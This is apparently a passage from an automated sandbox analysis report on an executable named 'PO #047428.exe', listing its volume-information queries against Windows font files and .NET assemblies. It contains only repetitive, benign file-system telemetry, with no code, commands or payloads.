Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Users\user\Desktop\PO #047428.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
